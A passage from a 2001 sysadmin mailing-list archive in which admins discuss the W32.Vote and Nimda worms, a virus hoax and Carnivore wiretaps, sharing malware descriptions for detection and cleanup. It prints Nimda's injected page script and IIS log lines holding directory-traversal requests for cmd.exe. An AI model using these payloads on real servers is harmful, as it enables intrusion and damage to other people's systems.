Compromises security settings: If the Backdoor.Trojan was successfully downloaded and installed, anyone could gain full access to the computer. 

Distribution: 


Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM! 
Name of attachment: WTC.exe 
Size of attachment: 55808 Bytes 


Technical description: 


W32.Vote.A@mm is a mass-mailing worm written in the Visual Basic language. It requires the file Msvbvm50.dll to execute.

When executed, the worm will attempt to email itself to all contacts in the Microsoft Outlook address book. The email will appear as follows.

Subject: Fwd:Peace BeTweeN AmeriCa and IsLaM!


Message: 
Hi
iS iT A waR Against AmeriCa Or IsLaM !?
Let's Vote To Live in Peace!


Attachment: WTC.EXE


Next, the worm will insert two .vbs files on the system:



\Windows folder\ZaCker.vbs
\Windows\System folder\MixDaLaL.vbs


In addition, the worm will attempt to download and execute a file. This file is detected as Backdoor.Trojan by Norton Antivirus.

Finally, the worm will attempt to delete all files from several folders. These folders appear to be the default installation folders for several antivirus products. For Norton AntiVirus, this worm will only attempt to delete the files if Norton Antivirus is located in C:\Program Files\Norton AntiVirus.

What the dropped files do


MixDaLaL.vbs
MixDaLaL.vbs is a Visual Basic Script file that is inserted in the \Windows\System folder. This file is executed by the worm. As the file is executed, it will look through all folders on all fixed drives and network drives for files with the extensions .htm or .html. If such a files are found, they are overwritten with the message:

AmeRiCa ...Few Days WiLL Show You What We Can Do !!! It's Our Turn  ZaCkEr is So Sorry For You


ZaCker.VBS
This file is inserted in the \Windows\System folder. It is not executed by the worm. Instead, the value


Norton.Thar \Windows\System\ZaCker.vbs


is added to the registry key


HKEY_LOCAL_MACHINE\Microsoft\
Windows\CurrentVersion\Run


so that the file is executed when you start Windows.


When executed at the next restart, this file will attempt to delete all files in the \Windows folder. Next, the worm will create or overwrite the file C:\Autoexec.bat. Inside the file there will be a command that formats the C drive. The Autoexec.bat file is executed on Windows 95/98/Me and DOS systems when you start the computer.

Finally, the worm will displays the message




The worm does attempt to shut down Windows after the message has been displayed. However, because the files required for this event to occur have been deleted from the \Windows folder, the computer probably will not shut down.


Removal instructions: 



1. Run LiveUpdate to make sure that you have the most recent virus definitions.
2. Start Norton AntiVirus (NAV), and make sure that NAV is configured to scan all files. For instructions on how to do this, read the document How to configure Norton AntiVirus to scan all files.

3. Run a full system scan.
4. Delete all files that are detected as W32.Vote.A@mm. If the worm has run and Norton AntiVirus is installed in C:\Program Files\Norton AntiVirus, you should reinstall Norton Antivirus.

5. If the computer has been rebooted after the infection, or if the computer seems very unstable, it is recommended that you reinstall the operating system.



Additional information: 


If the Backdoor.Trojan was successfully installed on the computer, it is possible that your system has been accessed remotely by an unauthorized user. For this reason it is impossible to guarantee the integrity of a system that has had such an infection. The remote user could have made changes to your system, including but not limited to the following:


Stealing or changing passwords or password files

RE: How do you all do it?

2001-09-21 Thread RZorz
Title: RE: How do you all do it?





This list didn't help me with Nimda as much as it did with ILOVEYOU. Fellow listers from all over the world started crashing, and I was able to handle it here with a brilliant low-tech solution - I printed a big warning out and put it on everyone's desktop. With only 50 users that was feasible, and because I'm in at least 2 hours earlier than anyone else. But this list saved the day! 

-Original Message-
From: Martin Blackstone [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 3:29 PM
To: NT System Admin Issues
Subject: RE: How do you all do it?



I was going to say that.
There are some MAJOR advantages to being on these lists.
As an example, many of us knew about Nimda hours before anyone else did.
Granted we didn't have technical details or a name, but we knew there
was something bad happening and to start battening down the hatches. You
cant put a price on info like that.
I guarantee you, you sub to these lists, your knowledge will grow
exponentially, and you will look like a hero to your boss when you know
the S*T is about to hit the fan well before anyone else does.


-Original Message-
From: Diane Beckham [mailto:[EMAIL PROTECTED]] 
Sent: Thursday, September 20, 2001 3:26 PM
To: NT System Admin Issues
Subject: RE: How do you all do it?



Hey, this IS work. Knowing about a virus BEFORE users tell us, is major
work


Diane


-Original Message-
From: Don Collier (Intermap Denver) [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 3:03 PM
To: NT System Admin Issues
Subject: How do you all do it?



I just joined this list today and am overwhelmed with email. Almost 200
messages today. How do you all keep up with this list and get any work
done? (Not meant to imply anything)



_
Don Collier
Network Administrator
Intermap Technologies Inc.
Voice: 303-708-0955 x-207
Fax: 303-708-0952
[EMAIL PROTECTED] 
www.intermaptechnologies.com


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: WORST EVER VIRUS (CNN announced)

2001-09-20 Thread RZorz
Title: RE: WORST EVER VIRUS (CNN announced)





Hoax. see www.sophos.com. Of course, if I was going to create a virus, first thing I'd do is name it after one of the hoaxes. 

-Original Message-
From: Sabrina Stolcz [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 1:18 PM
To: NT System Admin Issues
Subject: WORST EVER VIRUS (CNN announced)




WORST EVER VIRUS (CNN announced) 
   PLEASE SEND THIS TO EVERYONE ON YOUR CONTACT LIST!! 
   A new virus has just been discovered that has been classified by 
  Microsoft 
   as the most destructive ever! 
   This virus was discovered yesterday afternoon by McAfee and no
 vaccine 
  has 
   yet been developed. This virus simply destroys Sector Zero from the
  hard 
   disk, where vital information for its Functioning are stored. This 
  virus 
   acts in the following manner: 
   It sends itself automatically to all contacts on your list with the 
  title 
   A Virtual Card for You. As soon as the supposed virtual card is 
  opened, 
   the computer freezes so that the user has to reboot. When the 
  ctrl+alt+del 
   keys or the reset button are pressed, the virus destroys Sector 
  Zero,thus 
   permanently destroying the hard disk. 
   Yesterday in just a few hours this virus caused panic in New York, 
   according to news broadcast by CNN. This alert was received by an 
  employee 
   of Microsoft itself. So don't open any mails with subject: 
   A Virtual Card for You. As soon as you get the mail, delete it.










This email with all information contained herein or attached hereto may
contain confidential and/or privileged information intended for the
addressee(s) only. If you have received this email in error, please contact
the sender and immediately delete this email in its entirety and any
attachments thereto..




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Microsoft Has Nimda

2001-09-20 Thread RZorz
Title: RE: Microsoft Has Nimda





I think all John was trying to point out is that of all companies, MS should be more on top of all this crap than anyone, since all too often we're having to connect to them to get patches/fixes/etc to fix vulnerabilities in their products. 

Weren't the MS sites we were connecting to get the Code Red security patches infected themselves? Wasn't there a problem with the Microsoft/Frontpage site caused by Nimda? 

That's some serious negligence on Microsoft's part. 


-Original Message-
From: Dillon, Jeff [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 1:29 PM
To: NT System Admin Issues
Subject: RE: Microsoft Has Nimda



Operant Conditioning 101: behavior is controlled by its consequences, but
most IT depts are skilled at dodging those consequences (which reinforces
THAT behavior), so nothing changes/improves. The problem that management
has is determining whether any given admin crime is worthy of the death
sentence, since a firing impacts morale and often requires a new (expensive)
hire. I see two places where improvement could be made: 1)upgrade the
multitude of admins (not fast or easy or cheap), or 2)upgrade the product's
ability to keep ITSELF patched (which is Microsoft's baby). There seems to
be a certain efficiency in #2.


-Original Message-
From: John Hornbuckle [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 4:10 PM
To: NT System Admin Issues
Subject: RE: Microsoft Has Nimda



Some mistakes are worse than others. The worse the mistake, the harsher
the punishment.


Sometimes people need to be fired.




John Hornbuckle
Network Manager
Taylor County School District
318 North Clark Street
Perry, FL 32347 




-Original Message-
From: Mal Sasalu [mailto:[EMAIL PROTECTED]] 
Sent: Thursday, September 20, 2001 3:54 PM
To: NT System Admin Issues
Subject: RE: Microsoft Has Nimda





If firing someone or cutting off somebody's head for any mistake was an
answer, you'd have heard bombs by now!



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Help for the Nimda virus

2001-09-19 Thread RZorz
Title: RE: Help for the Nimda virus





Yo John - how come all your responses are blank. Or is just me. 


-Original Message-
From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 10:18 AM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus





 -Original Message-
 From: Jim Busick [mailto:[EMAIL PROTECTED]]
 Sent: Wednesday, September 19, 2001 1:03 PM
 To: NT System Admin Issues
 Subject: RE: Help for the Nimda virus
 
 
 Very usefull tool. Thanks John.


You're welcome!


John


 
  -Original Message-
  From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
  Sent: Wednesday, September 19, 2001 10:02 AM
  To: NT System Admin Issues
  Subject: RE: Help for the Nimda virus
  
  
  
  
   -Original Message-
   From: Jim Busick [mailto:[EMAIL PROTECTED]]
   Sent: Wednesday, September 19, 2001 12:36 PM
   To: NT System Admin Issues
   Subject: RE: Help for the Nimda virus
  
  
   I find it ironic that I had to use Explorer Search to find Searchit.
  
  Yes, there is a glitch in the installer program we used. It 
  works fine on
  NT4.0 but on Win2k it appends the setup path to the exe's 
  install path. It's
  fairly easy to set the searchit.exe path to 
  c:\winnt\system32\searchit.exe
  and it will be fine.
  We'll get that fixed as soon as we get the fix for the installer.
  
  John Cesta
  
-Original Message-
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 9:29 AM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus
   
   
Mod the shortcut to point to the windows dir and it works fine.
   
Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
 301-610-9584 voice
 240-465-0323 Efax
   
-Original Message-
From: Jim Busick [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 12:26 PM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus
   
We appreciate the thought, but the tool does not install properly.
   
 -Original Message-
 From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
 Sent: Wednesday, September 19, 2001 8:14 AM
 To: NT System Admin Issues
 Subject: RE: Help for the Nimda virus




  -Original Message-
  From: Kevin Lundy [mailto:[EMAIL PROTECTED]]
  Sent: Wednesday, September 19, 2001 10:54 AM
  To: NT System Admin Issues
  Subject: RE: Help for the Nimda virus
 
 
  It also doesn't work. I downloaded and installed it, and
 it didn't even
  create an executable.

 That's not true actually.

 1. It is FREE a production copy. The link is right on the
 home page to the
 right of the dancing tools.
 2. The search.exe file is in the c:\winnt\system32 directory.

 I didn't think it would be difficult to give something 
  away. :0

 John


 
  -Original Message-
  From: Givens, Mike [mailto:[EMAIL PROTECTED]]
  Sent: Wednesday, September 19, 2001 10:51 AM
  To: NT System Admin Issues
  Subject: RE: Help for the Nimda virus
 
 
  define free the link provided only goes to a trail
 version located in
  the downloads area ?
 
  -Original Message-
  From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
  Sent: Wednesday, September 19, 2001 9:50 AM
  To: NT System Admin Issues
  Subject: Help for the Nimda virus
 
 
 
 
  Previous email contained an incorrectly formatted URL.
Try this one.
 
  If any one is interested: We are giving away FREE our
 SearchIt program.
  SearchIt can search your logfiles, or any files, for text
 strings you
  define. You can search for cmd.exe or tftp or any 
  other piece of
  a virus or
  IIS exploit. SearchIt may be run via a scheduler and a
 report of the found
  files is emailed to you.
 
  The FREE Download is at: http://www.serverautomationtools.com
 
  John Cesta
 
 
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
 
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
 
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
 
 


 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

   
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
   
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
   
  
   http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
  
  
  
  
  http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
  
 
 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
 
 


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Help for the Nimda virus

2001-09-19 Thread RZorz
Title: RE: Help for the Nimda virus



Doh!!! I so rarely look down there unless someone responds 
"inline". Sorry

  -Original Message-From: John Cesta - Lists 
  [mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 19, 2001 11:09 
  AMTo: NT System Admin IssuesSubject: RE: Help for the 
  Nimda virus
  Yo John - how come all your responses are blank. Or is just 
  me.
  
  Maybe because I am entering them under the question 
  inline.
  
  John
  
-Original Message-From: 
[EMAIL PROTECTED] 
[mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 
19, 2001 1:57 PMTo: NT System Admin IssuesSubject: RE: 
Help for the Nimda virus
Yo John - how come all your responses are blank. Or is just 
me.


-Original Message- From: 
John Cesta - Lists [mailto:[EMAIL PROTECTED]] 
Sent: Wednesday, September 19, 2001 10:18 AM 
To: NT System Admin Issues Subject: 
RE: Help for the Nimda virus 
 -Original Message-  
From: Jim Busick [mailto:[EMAIL PROTECTED]] 
 Sent: Wednesday, September 19, 2001 1:03 PM 
 To: NT System Admin Issues  Subject: RE: Help for the Nimda virusVery 
usefull tool. Thanks John. 
You're welcome! 
John 
   -Original 
Message-   From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] 
  Sent: Wednesday, September 19, 2001 10:02 
AM   To: NT System Admin Issues 
  Subject: RE: Help for the Nimda virus 


   -Original Message- 
   From: Jim Busick [mailto:[EMAIL PROTECTED]] 
   Sent: Wednesday, September 19, 2001 12:36 
PMTo: NT System Admin Issues 
   Subject: RE: Help for the Nimda virus 
 
I find it ironic that I had to 
use Explorer Search to find Searchit.   
  Yes, there is a glitch in the installer 
program we used. It   works fine on 
  NT4.0 but on Win2k it appends the setup path to 
the exe's   install path. It's 
  fairly easy to set the searchit.exe path to 
  c:\winnt\system32\searchit.exe 
  and it will be fine.  
 We'll get that fixed as soon as we get the fix for the 
installer.
 John Cesta-Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] 
Sent: Wednesday, September 19, 2001 
9:29 AM To: NT System Admin 
Issues Subject: RE: Help for the 
Nimda virus Mod 
the shortcut to point to the windows dir and it works fine. Steve 
Clark Clark Systems Support, 
LLC AVIEN Charter Member 
www.clarksupport.com  
301-610-9584 voice 
 240-465-0323 Efax 
   
 -Original Message- 
From: Jim Busick [mailto:[EMAIL PROTECTED]] 
Sent: Wednesday, September 19, 2001 
12:26 PM To: NT System Admin 
Issues Subject: RE: Help for the 
Nimda virus We appreciate the thought, but the tool does not 
install properly. 
 -Original Message- 
 From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] 
 Sent: Wednesday, September 19, 
2001 8:14 AM  To: NT System 
Admin Issues  Subject: RE: 
Help for the Nimda virus 
   
   -Original 
Message-   From: 
Kevin Lundy [mailto:[EMAIL PROTECTED]] 
  Sent: Wednesday, September 
19, 2001 10:54 AM   To: 
NT System Admin Issues   
Subject: RE: Help for the Nimda virus
 
  It also doesn't work. I 
downloaded and installed it, and 
 it didn't even   
create an executable. 
  That's not true 
actually.   1. It is FREE a production copy. The link is 
right on the  home page to 
the  right of the dancing 
tools.  2. The search.exe 
file is in the c:\winnt\system32 directory.  
 I 
didn't think it would be difficult to give something   away. :0 
  John  
 -Original Message- 
  From: Givens, Mike [mailto:[EMAIL PROTECTED]] 
  Sent: Wednesday, September 
19, 2001 10:51 AM   To: 
NT System Admin Issues   
Subject: RE: Help for the Nimda virus
 
  define "free" the link 
provided only goes to a "trail" 
 version located in  
 the downloads area ?  
   -Original 
Message-   From: 
John Cesta - Lists [mailto:[EMAIL PROTECTED]] 
  Sent: Wednesday, September 
19, 2001 9:50 AM   To: 
NT System Admin Issues   
Subject: Help for the Nimda virus
 
   
  
 Previous email contained an incorrectly formatted URL. Try this one.   
  If 
any one is interested: We are giving away FREE our  SearchIt program.   SearchIt can search your logfiles, or 
any files, for text  strings 

RE: .BHF

2001-09-19 Thread RZorz
Title: RE: .BHF





from symantec.com


System Modifications


When executed the worm determines from where it is being executed. The worm
then overwrites MMC.EXE in the Windows Directory or creates a copy of itself
in the Windows Temporary Directory.


The worm then infects commonly used executables listed in the registry keys:


HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders


The worm hooks the system by modifying the system.ini file as follows:


Shell = explorer.exe load.exe -dontrunold


It also replaces the file Riched20.dll. Riched20.dll is a legitimate Windows
.DLL used by applications such as Microsoft Word. By replacing this DLL, the
worm is executed each time applications such as Microsoft Word are executed.


The worm copies itself as the file:


%Windows\System%\load.exe


NOTE: %Windows\System% is a variable. The worm locates the \Windows\System
folder (by default this is C:\Windows\System) and copies itself to that
location


The worm then attempts to modify files with the extension .htm, .html., and
.asp or filenames matching default, index, main and readme on the local
system that are shared with other network computers. .EXE files are infected
and .EML and .NWS files are replaced by the virus.


Next, the worm creates open network shares for all drives on the computer by
modifying the registry key:


HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\[C$ - Z$]


A reboot of the computer is required for these settings to take effect.


The worm searches for all open shares on the network by iterating through
the Network Neighborhood. All files on any open network shares are examined
for possible infection. .EXE files are infected by the worm except
WINZIP32.EXE. .EML and .NWS files are copied to the open network shares and
the worm copies itself over as riched20.dll to any directory with .DOC
files.


During execution, the worm may attempt to delete copies of itself. If the
file is in use or locked, the worm will create WININIT.INI with an entry to
delete itself upon reboot.


The worm contains bugs and can be resource intensive. Thus, not all actions
may occur and system instability may be noticable.



-Original Message-
From: David Coffey [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 11:37 AM
To: NT System Admin Issues
Subject: .BHF



Hi everyone,
As most did we too got hit with the NIMDA virus. Has anyone experienced
problems with Windows Explorer.exe after cleaning up your nt server? 
Also, I'm now getting a message at startup that says: Windows is
searching for Connect from ouside.BHF. To locate the file yourself, click
Browse. I can't find any information on this .bhf file and I am
wondering if it's virus related. Lastly when I get the Dr. Watson for
explorer.exe I also lose the Norton icon from the tray?
Thanks,
Dave


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Senate votes to permit warrantless Net-wiretaps, Carnivore us e

2001-09-18 Thread RZorz
Title: RE: Senate votes to permit warrantless Net-wiretaps, Carnivore use





As much as I don't necessarily have a problem with this, the real question will be what happens when someone makes an offhand, attempt-at-humor comment that sets off whatever filters they're looking for. Will my kid get put on a list because he's researching and chatting with friends about JFK's assasination and the phrase kill the president is in their conversation? 

-Original Message-
From: Martin Blackstone [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 5:50 AM
To: NT System Admin Issues
Subject: RE: Senate votes to permit warrantless Net-wiretaps, Carnivore
use



Here here!


-Original Message-
From: Jerry Kennedy [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 5:53 AM
To: NT System Admin Issues
Subject: Re: Senate votes to permit warrantless Net-wiretaps, Carnivore
use



Write my Congressman about what? About implementing laws designed to
protect us at the cost of a minor infringement on my civil rights? What
are they doing that your employer or network admins, who could use
benign e-mails in a much more malicious manner, don't already do. While
I don't like it that we have go to these lengths, I feel it's necessary
for our National Security. Besides, I've nothing to hide and if I had
something to hide I would not be likely to send it via e-mail. Maybe,
just maybe, if we had this in place a while back, some 6,000+ people,
some of which may have even been on this list, would still be with us.
It's a dangerous world out there, which requires unpleasant measures.
GOD BLESS AMERICA.


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: WARNING: Hacker Alert

2001-09-18 Thread RZorz
Title: RE: WARNING: Hacker Alert





How do you do that? 


-Original Message-
From: Kevin Lundy [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 8:26 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert



looks like an exploit of the Hacked by Chinese type from several months
ago.


None of my servers have shown attempts.


One easy way to stop most of the IIS probing is to simply require host
headers on all sites. If your server doesn't respond when the get/put
commands use an IP number, then most vulnerabilities aren't vulnerable.
Then any scans would need to be done via DNS rather than random IP numbers,
significantly slowing attacks.


-Original Message-
From: Martin Blackstone [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 11:19 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert



Here is a site that has been hit
http://216.39.178.32


-Original Message-
From: Jason Morris [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 7:59 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert



CodeRed seems to have dwindled to nothing on my logs. But it's being
replaced with the EXACT same lines you have below, and they stay
consistent with the code red 2 methods of attacking the more local
subnets.


Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]



-Original Message-
From: Jason Morris [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:50 AM
To: NT System Admin Issues
Cc: '[EMAIL PROTECTED]'
Subject: RE: WARNING: Hacker Alert



Yes. It seems to be systems I have previously monitored hitting me with
codered attacks. I bet someone is activating all of their children.


Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]



-Original Message-
From: xylog [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:45 AM
To: NT System Admin Issues
Subject: WARNING: Hacker Alert



All my public facing web servers at home and at my office have shown a
huge continuous hacking activity. Has anyone seen similar? I fear this
may be code red related or automated. Please comment if you have seen
similar. Here is an excerpt from one logfile:


63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145,
0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
604, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir, 63.101.9.107,
-, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3,
GET, /winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01,
10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -,
9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -,
9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -,
9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -,
9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0,
GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:02,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe,
/c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80,
604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15, 80, 604, 404, 3, GET,
/d/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:06,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0,
117, 0, 500, 87, GET,
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0,
145, 0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15,
97, 604, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156,
41, 13975, 200, 0, GET, 

RE: FW: Worm probes

2001-09-18 Thread RZorz
Title: RE: FW: Worm probes





From Panda (note they won't have a sig file for a few hours yet):
Panda Software alerts users on the appearance of W32/Nimda.A@mm (alias Nimda), possibly originated in China, which spreads through the e-mail and is automatically executed simply by previewing the message that contains it. 

To perform the infection it exploits a vulnerability discovered by the security expert Juan Carlos García Cuartango in Internet Explorer 5 browser, as well as Outlook and Outlook Express mail clients. This flaw allows for the automatic and immediate execution of files. This means no action, such as double-clicking the attached file, is necessary for the virus to be activated. However, it requires that the 'preview' option is enabled in the mail clients for the vulnerability to be exploited and README.EXE, the virus filename, to be executed.

Due to this threat, Panda Software recommends to follow up the news appearing in the specialised media. It also warns against opening the mail client before the anti-virus is updated with the corresponding pav.sig, which will be made available to all users by the European multinational in the next few hours, together with the additional info about the virus.


-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:21 PM
To: NT System Admin Issues
Subject: Fw: FW: Worm probes



Here's one from a thread on nanog


HTH,


Geoff


- Original Message -
From: Jim Olsen [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, September 18, 2001 11:03 AM
Subject: Re: FW: Worm probes




 This is the information i've collected thus far on W32.nimda:

 W32.nimda is NOT a code red variant, and the people who referring to it as
 Code Blue were mistaken...

 The name it has been given (at least by TruSecure) is W32.nimda.a.mm. It
uses
 several vulnerabilities in Windows NT and 2000 server's to infect a
server,
 and also employ's email and web site mobile code to infect Windows
 9x/ME/NT/2k boxes.

 During the initial infection of a server, the worm does the following:
 - download a file named admin.dll via tftp from the system that
is
 trying to infect the target
 - add the guest account to the local administrators group and
 activates the account
 - makes sure c$ is shared out
 - copies itself to c, d, and e drives
 - tries to mail itself to email addresses that it discovers on the
 server
 - creates a file named readme.exe, which is used in the mobile
code
 inserted on the web sites below
 - add this string to the web pages found on the server:
 htmlscript language=JavaScriptwindow.open(readme.eml, null,
 resizable=no,top=6000,left=6000)/script/html
 - scans for and infects other vulnerable IIS servers
 - goes through all shared directories and puts sample.nws,
 sample.eml, desktop.eml, desktop.nws in each directory. these are eml
 messages with copies of itself (readme.exe) autoloaded by the mobile html
 code mentioned above.
 - goes through all shared directories and puts riched20.dll in
each
 directory, which is a trogan dll version of W32.nimda that is meant to
 infect people running notepad/wordpad in that directory.
 - puts a trojan mmc.exe in the winnt directory that is a copy of
 itself in the above readme.exe format (win2000 only)

 If a user views a web site that is hosted on an infected server, the
 following happens:
 - upon viewing an infected page, the mobile code extracts to
 readme.exe and starts in windows media player (without user intervention)
 - the user's machine becomes infected with W32.nimda at this point
 and time
 - the worm starts scanning for other vulnerable IIS servers
 - the worm emails itself to everyone on the user's address book
 - goes through all shared directories and puts sample.nws,
 sample.eml, desktop.eml, desktop.nws in each directory. these are eml
 messages with copies of itself (readme.exe) autoloaded by the mobile html
 code mentioned above.
 - goes through all shared directories and puts riched20.dll in
each
 directory, which is a trogjan dll version of W32.nimda that is meant to
 infect people running notepad/wordpad in that directory.
 - puts a trojan mmc.exe in the winnt directory that is a copy of
 itself in the above readme.exe format (win2000 only)

 It us unknown to me what happens (at this point in time) if a user opens
an
 attachment that is sent from an infected site. It is possible that it
could
 automatically infect the user's computer using the same methods mentioned
 above.

 EVERYONE who uses internet explorer to browse the internet should probably
do
 one of two things to stop from being automatically infected by W32.nimda
(i
 have not tested whether or not turning off javascript fixes the problem):
 o) don't browse web pages until microsoft releases a patch
 o) turn OFF javascript

 EVERYONE who uses outlook/outlook express should, at the very least, not
open
 any attachments that they are not expecting. Turning off auto-preview

RE: FW: Worm probes

2001-09-18 Thread RZorz
Title: RE: FW: Worm probes



reg 
hack to not execute perhaps? 

  -Original Message-From: John Cesta - Lists 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 2001 12:57 
  PMTo: NT System Admin IssuesSubject: RE: FW: Worm 
  probes
  
  
-Original Message-From: 
[EMAIL PROTECTED] 
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 
2001 3:26 PMTo: NT System Admin IssuesSubject: RE: FW: 
Worm probes
From Panda (note they won't have a sig file for a few hours 
yet): Panda Software alerts users on the appearance 
of W32/Nimda.A@mm (alias Nimda), possibly originated in China, which spreads 
